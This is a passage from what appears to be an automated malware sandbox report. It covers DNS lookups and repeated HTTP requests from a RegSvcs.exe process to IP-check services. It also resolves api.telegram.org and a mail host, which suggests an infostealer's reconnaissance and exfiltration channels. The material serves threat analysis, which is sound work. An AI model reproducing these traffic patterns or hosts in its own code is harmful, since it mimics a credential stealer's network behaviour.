                                                                                                          Jan 10, 2025 18:46:34.028306007 CET1.1.1.1192.168.2.40x1129No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:34.028306007 CET1.1.1.1192.168.2.40x1129No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:35.049424887 CET1.1.1.1192.168.2.40x413No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:35.049424887 CET1.1.1.1192.168.2.40x413No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:35.049424887 CET1.1.1.1192.168.2.40x413No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:35.049424887 CET1.1.1.1192.168.2.40x413No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:35.049424887 CET1.1.1.1192.168.2.40x413No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:35.049424887 CET1.1.1.1192.168.2.40x413No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:35.049424887 CET1.1.1.1192.168.2.40x413No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:46.145946980 CET1.1.1.1192.168.2.40x4737No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:52.772402048 CET1.1.1.1192.168.2.40x902eNo error (0)mail.standartasansor.com178.210.170.40A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • checkip.dyndns.org

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449730193.122.6.168803328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:34.038968086 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 18:46:34.673624992 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:34 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 10, 2025 18:46:34.705295086 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 18:46:34.893802881 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:34 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 10, 2025 18:46:35.925177097 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 18:46:36.113127947 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:36 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449733193.122.6.168803328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:36.774924994 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 18:46:37.418919086 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:37 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449735193.122.6.168803328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:38.055321932 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 18:46:38.733916998 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:38 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.449737193.122.6.168803328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:39.391823053 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 18:46:40.040877104 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:39 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.449739193.122.6.168803328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:40.692640066 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 18:46:41.341200113 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:41 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.449741193.122.6.168803328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:42.005754948 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 18:46:42.667922974 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:42 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.449743193.122.6.168803328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:43.424245119 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 18:46:44.079435110 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:43 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.449747193.122.6.168803328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:44.693042994 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 18:46:45.348901987 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:45 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.449754193.122.6.168804048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:49.354959965 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 18:46:50.091666937 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:50 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 10, 2025 18:46:50.095407963 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 18:46:50.286128044 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:50 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 10, 2025 18:46:51.012773037 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 18:46:51.227150917 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:51 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.449757193.122.6.168804048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:51.878251076 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 18:46:52.652055979 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:52 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.449760193.122.6.168804048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:53.622620106 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 18:46:54.263209105 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:54 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.449762193.122.6.168804048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:55.004106998 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 18:46:55.670500994 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:55 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.449764193.122.6.168804048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:56.331399918 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 18:46:56.980945110 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:56 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.449766193.122.6.168804048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:57.610989094 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 18:46:58.275707960 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:58 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.449768193.122.6.168804048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:46:58.937040091 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 18:46:59.748574018 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:59 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.449770193.122.6.168804048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 18:47:00.427499056 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 18:47:01.063929081 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:47:00 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
